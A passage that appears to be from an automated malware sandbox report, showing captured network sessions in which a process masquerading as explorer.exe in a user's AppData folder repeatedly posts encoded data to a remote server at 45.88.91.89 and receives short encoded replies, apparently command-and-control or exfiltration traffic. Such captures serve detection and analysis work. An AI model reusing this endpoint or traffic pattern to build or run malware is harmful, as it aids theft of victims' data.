                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      69 | 192.168.2.6 | 50028 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:06.656091928 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:07.001132011 CET | 2568 | OUT | Data Raw: 56 51 58 58 56 58 55 54 5b 5f 52 55 59 5e 57 59 57 5a 5f 5b 50 5c 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQXXVXUT[_RUY^WYWZ_[P\VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9/+'.?U+3%,?0/?X*$^&+5#T/2>2$-;;=$[' \,
                                                      Dec 13, 2024 14:34:07.747376919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:07.981231928 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:07 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      70 | 192.168.2.6 | 50032 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:08.228527069 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:08.581093073 CET | 2568 | OUT | Data Raw: 53 50 5d 58 56 5e 50 55 5b 5f 52 55 59 5b 57 5a 57 59 5f 5a 50 52 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]XV^PU[_RUY[WZWY_ZPRV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":< $=#W<,$+$Z+\?#' 142)F$Y8=$[' \,.
                                                      Dec 13, 2024 14:34:09.314498901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:09.553270102 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:09 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      71 | 192.168.2.6 | 50037 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:09.795923948 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:10.141527891 CET | 2568 | OUT | Data Raw: 56 55 5d 52 56 55 55 54 5b 5f 52 55 59 5a 57 5d 57 52 5f 5f 50 5f 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]RVUUT[_RUYZW]WR__P_V__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".,('0(+0?<R$Z(?4?0;5#_%5%><X8=$[' \,*
                                                      Dec 13, 2024 14:34:10.880501986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:11.116856098 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      72 | 192.168.2.6 | 50041 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:11.351912022 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      73 | 192.168.2.6 | 50044 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:11.700481892 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:12.047894001 CET | 1456 | OUT | Data Raw: 53 50 5d 52 56 5c 50 57 5b 5f 52 55 59 5c 57 5a 57 5c 5f 58 50 5c 56 5e 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]RV\PW[_RUY\WZW\_XP\V^_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z-'^$>+U(Z$Y'Z?'+0!72?&"%>/$[' \,2
                                                      Dec 13, 2024 14:34:12.953524113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:13.173146963 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 01 2b 07 20 0c 26 05 09 0f 25 2e 2d 11 2b 3c 26 06 39 2c 37 07 33 1d 3b 1d 28 20 3e 13 3e 34 3f 11 2b 20 25 11 23 3f 20 57 3a 0c 2f 5f 0d 11 38 12 20 10 04 5d 38 3d 30 04 3d 2d 3e 06 28 3f 3e 02 29 00 06 5d 26 38 2d 0d 25 2d 0c 51 29 39 0d 57 28 15 0a 5c 2d 12 31 5f 31 25 2f 57 0d 1e 27 18 28 31 25 59 20 16 1a 1b 22 2e 2a 03 3e 0a 31 0f 22 07 09 5a 27 3d 39 5d 26 12 0e 10 23 20 37 05 25 23 28 0a 24 17 23 57 31 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$+ &%.-+<&9,73;( >>4?+ %#? W:/_8 ]8=0=->(?>)]&8-%-Q)9W(\-1_1%/W'(1%Y ".*>1"Z'=9]&# 7%#($#W1/.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      74 | 192.168.2.6 | 50045 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:11.820432901 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:12.172714949 CET | 2568 | OUT | Data Raw: 53 56 5d 5b 56 59 50 50 5b 5f 52 55 59 5c 57 52 57 5d 5f 59 50 52 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV][VYPP[_RUY\WRW]_YPRVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-/,$>+</$]3? S0_(_'5[ Y$.9%- _8=$[' \,2
                                                      Dec 13, 2024 14:34:13.052211046 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:13.314819098 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      75 | 192.168.2.6 | 50049 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:13.553922892 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:13.907143116 CET | 2568 | OUT | Data Raw: 53 52 5d 5f 56 55 55 56 5b 5f 52 55 59 51 57 5e 57 52 5f 58 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SR]_VUUV[_RUYQW^WR_XP^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,</^0= >,$['<7'<<?+X3+:7,$>%G%=$_,$[' \,
                                                      Dec 13, 2024 14:34:14.643115997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:14.878845930 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      76 | 192.168.2.6 | 50053 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:15.116473913 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:15.469687939 CET | 2568 | OUT | Data Raw: 56 50 5d 5b 56 5a 50 50 5b 5f 52 55 59 5d 57 5a 57 58 5f 53 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VP][VZPP[_RUY]WZWX_SPSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.Z/]&.++(30?;(&(97"3_1>9@'X0^;$[' \,6
                                                      Dec 13, 2024 14:34:16.203387976 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:16.438047886 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      77 | 192.168.2.6 | 50058 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:16.686465025 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:17.032128096 CET | 2568 | OUT | Data Raw: 56 51 58 5b 53 59 55 50 5b 5f 52 55 59 5e 57 5a 57 5a 5f 53 50 53 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQX[SYUP[_RUY^WZWZ_SPSV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-7]'-;T>,<3U3<*$73(>41/[&=5$=0_8-$[' \,
                                                      Dec 13, 2024 14:34:17.891248941 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:18.021173000 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      78 | 192.168.2.6 | 50063 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:18.261209965 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:18.610286951 CET | 2568 | OUT | Data Raw: 56 55 5d 53 56 5a 55 50 5b 5f 52 55 59 5d 57 5a 57 5d 5f 5d 50 52 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]SVZUP[_RUY]WZW]_]PRVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".<$$X'U+,+$W3Y<'4'8>4T41=6%>X/-$[' \,6
                                                      Dec 13, 2024 14:34:19.346435070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:19.581126928 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      79 | 192.168.2.6 | 50064 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:18.311486959 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:18.657241106 CET | 1456 | OUT | Data Raw: 56 54 5d 58 56 5a 50 52 5b 5f 52 55 59 5e 57 58 57 5f 5f 5d 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VT]XVZPR[_RUY^WXW__]P^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":0'.?T+ %/(3?$(403;=X"",&>5$;=$[' \,
                                                      Dec 13, 2024 14:34:19.396612883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:19.632977009 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 00 3f 39 0e 0d 27 2b 2c 51 25 3d 2a 02 3e 01 36 07 39 2f 34 12 26 34 2b 1c 2b 1d 00 50 3e 1d 37 5f 3e 0d 3d 5d 34 01 3f 0e 2c 36 2f 5f 0d 11 3b 07 23 3e 36 12 2c 03 2f 5c 3d 3e 2a 01 3f 11 36 00 28 2e 30 5c 33 38 32 1f 26 2d 0f 08 29 29 30 0e 29 2b 38 19 2e 2c 07 58 25 1f 2f 57 0d 1e 24 0a 3c 32 2a 06 37 28 23 05 36 2d 29 5f 3e 24 26 56 21 07 2b 5a 25 2d 26 04 27 2c 0d 0e 37 55 23 01 31 30 20 0e 30 17 34 0b 26 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$?9'+,Q%=*>69/4&4++P>7_>=]4?,6/_;#>6,/\=>*?6(.0\382&-))0)+8.,X%/W$<2*7(#6-)_>$&V!+Z%-&',7U#10 04&/.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      80 | 192.168.2.6 | 50069 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:19.827079058 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:20.172736883 CET | 2568 | OUT | Data Raw: 53 52 58 5c 56 58 50 55 5b 5f 52 55 59 5c 57 5c 57 59 5f 5f 50 53 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SRX\VXPU[_RUY\W\WY__PSVY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.<(3. >/+%<,U'<(?^'+- !?_$>%C';8$[' \,2
                                                      Dec 13, 2024 14:34:20.929460049 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:21.165213108 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      81 | 192.168.2.6 | 50073 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:21.400960922 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:21.750854015 CET | 2568 | OUT | Data Raw: 53 55 5d 5c 53 5b 55 55 5b 5f 52 55 59 5b 57 5a 57 5f 5f 5b 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SU]\S[UU[_RUY[WZW__[PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z./ $+</?0<7%,(47389^42'.+-=$[' \,.
                                                      Dec 13, 2024 14:34:22.569737911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:22.793204069 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:22 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      82 | 192.168.2.6 | 50076 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:23.039093971 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
